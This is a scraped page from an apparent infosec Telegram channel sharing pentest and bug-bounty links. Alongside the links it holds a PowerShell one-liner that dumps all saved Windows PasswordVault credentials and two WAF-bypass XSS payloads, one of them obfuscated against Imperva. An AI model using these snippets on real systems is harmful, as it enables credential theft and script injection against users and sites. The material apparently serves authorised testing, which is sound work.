Information Security – Telegram

Information Security

414 subscribers

157 photos

5 videos

9 files

2.28K links

Information Security News

we are @sec_nerd twin brother

Download Telegram

About

Blog

Apps

Platform

Information Security

414 subscribers

Information Security

Dump local Creds

PS>
[void][http://Windows.Security.Credentials.PasswordVault,http://Windows.Security.Credentials,ContentType=WindowsRuntime]
$pw = New-Object http://Windows.Security.Credentials.PasswordVault
$pw.RetrieveAll() | % { $_.RetrievePassword();$_ }

#redteam #pentest

134 views18:12

Information Security

#bugbounty Tools

https://github.com/milo2012/pathbrute
https://github.com/lc/subjs
https://github.com/KathanP19/gaussrf
https://github.com/stevemcilwain/quiver
https://github.com/proabiral/inception
https://github.com/Broly157/auto.sh
https://github.com/codingo/crithit
https://github.com/vortexau/dnsvalidator
https://github.com/theblackturtle/fprobe
https://github.com/reconness/reconness

#bugbountytips

GitHub - milo2012/pathbrute: Pathbrute

Pathbrute. Contribute to milo2012/pathbrute development by creating an account on GitHub.

150 views18:29

Information Security

https://ophirharpaz.github.io/2020/04/09/how-does-ssh-port-forwarding-work.html

How Does SSH Port Forwarding Work?

I often use the command ssh server_addr -L localport:remoteaddr:remoteport to create an SSH tunnel. This allows me, for example, to communicate with a host that is only accessible to the SSH server. You can read more about SSH port forwarding (also known…

143 views12:22

Information Security

https://medium.com/@cyberdefecers/sudo-1-8-25p-a-tale-of-bufferoverflow-in-linux-cve-2019-18634-and-art-of-timing-attacks-in-web-bc6794407942

Sudo 1.8.25p:A tale of BufferOverflow in linux(CVE-2019–18634) and art of timing attacks in web applications

139 views15:42

Information Security

https://pentest.blog/how-to-test-horizontal-vertical-authorization-issues-in-web-application/

129 views19:50

Information Security

https://portswigger.net/web-security/access-control

portswigger.net

Access control vulnerabilities and privilege escalation | Web Security Academy

In this section, we describe: Privilege escalation. The types of vulnerabilities that can arise with access control. How to prevent access control ...

134 views20:07

Information Security

#CTF-wiki
https://t.co/HwOeDcUucI
PHP Code Auditing
https://t.co/aROQudgixZ
SQL Injection
https://t.co/avPQVgn3NV
XSS
https://t.co/TOpQCYaLXX
CSRF
https://t.co/cH1AyeFL1c
SSRF
https://t.co/65MuJ595Y4

#bugbounty,#bugbountytips

ctf-wiki.github.io

PHP Code Auditing - CTF Wiki

169 views20:14

Information Security

https://wpvulns.com/

144 views21:11

Information Security

http://bounty.offensiveai.com/

136 views06:01

Information Security

https://spyse.com/

139 views06:07

Information Security

https://itm4n.github.io/windows-server-netman-dll-hijacking/

Windows Server 2008R2-2019 NetMan DLL Hijacking

What if I told you that all editions of Windows Server, from 2008R2 to 2019, are prone to a DLL Hijacking in the %PATH% directories? What if I also told you that the impacted service runs as NT AUTHORITY\SYSTEM and that the DLL loading can be triggered by…

132 views11:38

Information Security

https://github.com/S3cur3Th1sSh1t/PowerSharpPack

GitHub - S3cur3Th1sSh1t/PowerSharpPack

Contribute to S3cur3Th1sSh1t/PowerSharpPack development by creating an account on GitHub.

126 views11:41

Information Security

https://github.com/DimitriFourny/cve-2019-6207

DimitriFourny/cve-2019-6207

MacOS kernel memory leak (4 bytes). Contribute to DimitriFourny/cve-2019-6207 development by creating an account on GitHub.

119 views11:43

Information Security

please note and share;

blocked:
onauxclick=confirm(2)

bypassed:
onauxclick=[2].some(confirm)

#XSS #WAF #WAFBypass #bugbountytips #security #infosec #hacking

127 views11:46

Information Security

Imperva WAF Bypass for XSS;

<details/open/ontoggle="self['wind'%2b'ow']['one'%2b'rror']=self['wind'%2b'ow']['ale'%2b'rt'];throw/**/self['doc'%2b'ument']['domain'];">

- without parentheses, 'alert', 'document.domain' , 'window' , space

#BugBounty #BugBountyTip #WAF #infosec

130 views12:01

Information Security

https://ctflearn.com/

136 views13:19

Information Security

https://khaoticdev.net/?p=815

Khaotic Developments

Hack The Box: Traverxec

Jump Ahead: Enum – Initial Access – User – Root – Resources TL;DR; To solve this machine, we begin by enumerating open services – finding ports 22 & 80 to be open.…

112 views15:43

Information Security

https://medium.com/@amangupta566/cors-misconfiguration-leads-to-steal-sensitive-information-disclosure-fdf050b68b66

CORS Misconfiguration Leads To Steal Sensitive Information Disclosure

Hello everyone, today I am going to share CORS misconfiguration can leads to sensitive information disclosure.

105 views15:44

Information Security

https://homjxi0e.wordpress.com/2018/02/15/lateral-movement-using-internetexplorer-application-object-com/

Lateral Movement Using internetexplorer.Application Object ( COM )

introduction Use Object COM ( InternetExplorer.Application ) For Execute using Types Exploit-internet Explorer For Execute ==> in Add On Internet Explorer For Get Execute Code using Lateral Move…

96 views15:48

Information Security

https://medium.com/@amangupta566/html-injection-in-cart-sharing-functionality-f78a5df45657

HTML Injection in Cart Sharing Functionality

Hello guys!! I am going to share one of the vulnerability I found in a web application.

101 views16:25